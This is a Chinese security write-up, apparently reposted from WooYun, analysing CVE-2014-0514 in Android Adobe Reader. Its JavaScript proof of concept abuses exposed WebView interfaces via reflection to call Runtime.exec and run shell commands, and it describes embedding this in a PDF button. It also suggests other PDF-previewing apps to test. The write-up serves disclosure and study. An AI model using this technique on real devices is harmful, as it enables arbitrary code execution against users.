

Android Adobe Reader 任意代码执行分析(附POC) | WooYun知识库
source link:
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Android Adobe Reader 任意代码执行分析(附POC)
0x00 描述
前几天老外在fd还有exploit-db上,公布了Adobe Reader任意代码执行的漏洞。
漏洞编号: CVE: 2014-0514
AdobeReader安装量比较大,又和浏览器容器不同,分析一下。
Android Adobe Reader 调用webview的不安全的Javascript interfaces。
导致可以执行任意js代码。具体查看WebView中接口隐患与手机挂马利用。
影响版本:
理论上Android Adobe Reader 11.2.0之前的版本多存在,Android version 11.1.3成功利用。
我查看了之前的几个版本例如Android Adobe Reader 11.1.2 如下图,问题也应该存在。
0x01利用
从反编译出来的java代码看
#!java
public class ARJavaScript
{
[...]
public ARJavaScript(ARViewerActivity paramARViewerActivity)
{
[...]
this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
}
_adobereader,_app,_doc,_escriptString,_event,_field
这几个变量都会存在任意代码执行的问题.
利用代码和之前一样。
#!java
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
这里不同是构造 恶意的PDF。
首先需要一个PDF编辑器,比如Adobe Acrobat(flash达人pz推荐).
然后添加表单按钮或者书签等,调用事件添加
我这里看了下button最好演示,和老外的那个poc一样基本上.
导入到android虚拟机里,打开,成功复现。
0x02 扩展
一些网盘或浏览器,看看能否调用adobe reader来预览pdf的应用可能会存在这个漏洞,大部分应用都是直接下载pdf到本地。可以再测试一些能预览pdf的邮箱之类的应用。
0x03 修复
新版本的Adobe Reader 11.2.0 [email protected]tInterface,老版本的用户则在adobereader禁用了表单的js执行。 不知道那些杀毒软件能不能检测到这些恶意poc呢 :)
附上poc.pdf
Recommend
-
122
近日,Git 被发现存在一个潜在的远程代码执行漏洞(CVE-2018-11235)。该漏洞源于在用 git clone 时没有对 submodule 的文件夹命名做足够的验证,当用户在使用 git clone –recurse-submodules 时, 攻击者可以通过构造一个...
-
29
Joomla远程代码执行漏洞分析 phith0n ...
-
53
-
49
首先附上米斯特安全大佬们文章的 链接 ,刚开始有些东西我没看的太懂,于是我就再添了点东西,希望像我一样的小白也能看懂。 一、漏洞综述 漏...
-
22
从ByteCTF的opensns 到前段时间斗象科技发的
-
13
一. Beetl 介绍 网上没搜索到 Beetl 模版引擎执行任意 Java 代码的方法,所以顺手看下文档,顺便分享下方法。 下是来自 官网 的简介: Beetl是Bee Template Language的...
-
10
这是一个由有条件的任意用户登录+低权限文件上传+低权限目录穿越+低权限文件包含组成。可能是盯着国内OA的人太多了,这个漏洞在2020年9月28号的11.8版本中被更新修复,比较可惜的是,一次更新修复了全部的漏洞逻辑,不禁令人惊叹。 今天就一起来看...
-
8
0x00简介 2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。 吃完饭回来看到这个公告都傻眼了,整个tp5系列都影响了,还是getshell。 (以下截图为后截图,主要是想讲...
-
7
作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/K9nmiwr8yL5tVxiLnhFDmA
-
6
Vision Pro 头显能被入侵执行任意代码,苹果发布更新修复漏洞|苹果公司|财务报表|财务会计|vision|第三方应用商店_网易订阅 IT之家 2 月 1 日消息,苹果公司...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK